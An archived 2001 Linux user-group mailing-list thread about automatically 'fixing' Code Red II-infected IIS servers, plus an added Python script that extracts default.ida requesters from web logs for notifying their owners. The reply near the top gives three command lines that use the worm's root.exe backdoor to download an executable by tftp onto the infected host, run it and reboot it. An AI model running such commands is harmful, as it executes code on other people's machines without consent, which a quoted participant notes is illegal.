Actually, since Code Red II installs a backdoor, you could have an autoresponder script that gets run against the IP of the machine hitting default.ida on your webserver. Something like (friggin Outlook capitalizes all of the following lines):

Lynx -source http://infectedhost/scripts/root.exe+/c+tftp+-i+tftpserver.yourdomain.com+GE T+iispatch.exe+c:\iispatch.exe > /dev/null
Lynx -source http://infectedhost/scripts/root.exe+/c+c:\iispatch.exe > /dev/null
Lynx -source http://infectedhost/scripts/root.exe+/c+reboot

Or something similar. You'd probably need something in there to remove the worm also, because the patch won't remove the worm from the system.

> -----Original Message-----
> From: joel at luths.net [mailto:joel at luths.net]
> Sent: Tuesday, August 07, 2001 1:10 PM
> To: tclug-list at mn-linux.org
> Subject: Re: [TCLUG] Code Red Auto Fix
>
> Seems like webmaster at domain is often a black hole anyway.
> Anyone who still has an unpatched IIS is unlikely to have set up
> a proper webmaster mail account.
>
> Quoting Yaron <jethro at freakzilla.com>:
>
> > Hi,
> >
> > On Tue, 7 Aug 2001, Spencer J Sinn wrote:
> >
> > > Making changes or modifications to anyone's machine without their
> > > express consent is illegal. Setting up an auto-mailer to contact
> > > the webmaster is not a bad idea.
> >
> > Except a lot of these are dorky kids running NT with no mail support.
> >
> > -Yaron
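
For the notification approach mentioned in the thread, a script first has to pull the hosts requesting default.ida out of the web server log. The following is an added example, not code from any list participant; it assumes Common Log Format, and the sample log lines, addresses and function names are constructed for illustration.

```python
import re
from collections import OrderedDict
from datetime import datetime

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')

# Constructed sample lines (documentation address ranges, shortened query strings).
SAMPLE_LOG = """\
192.0.2.10 - - [07/Aug/2001:13:02:11 -0500] "GET /default.ida?XXXXXXXX HTTP/1.0" 404 276
198.51.100.7 - - [07/Aug/2001:13:02:40 -0500] "GET /index.html HTTP/1.0" 200 1043
192.0.2.10 - - [07/Aug/2001:13:09:55 -0500] "GET /default.ida?XXXXXXXX HTTP/1.0" 404 276
203.0.113.5 - - [07/Aug/2001:13:11:02 -0500] "GET /DEFAULT.IDA?XXXXXXXX HTTP/1.0" 404 276
this line is not a valid log entry
"""

def find_default_ida_hits(log_text):
    """Return {source_ip: {"count", "first", "last"}} for requests to /default.ida."""
    hits = OrderedDict()
    for line in log_text.splitlines():
        m = CLF.match(line)
        if not m:
            continue  # skip malformed lines instead of aborting the scan
        host, stamp, _method, target, _status = m.groups()
        path = target.split("?", 1)[0].lower()  # IIS paths are case-insensitive
        if path != "/default.ida":
            continue
        when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
        entry = hits.setdefault(host, {"count": 0, "first": when, "last": when})
        entry["count"] += 1
        entry["first"] = min(entry["first"], when)
        entry["last"] = max(entry["last"], when)
    return hits

def format_report(hits):
    """One line per source, suitable for pasting into a notice to the network owner."""
    return [
        f"{ip}: {e['count']} request(s) for /default.ida, "
        f"{e['first'].isoformat()} to {e['last'].isoformat()}"
        for ip, e in hits.items()
    ]

if __name__ == "__main__":
    print("\n".join(format_report(find_default_ida_hits(SAMPLE_LOG))))
```

The per-source first and last timestamps give the receiving administrator something to match against their own logs.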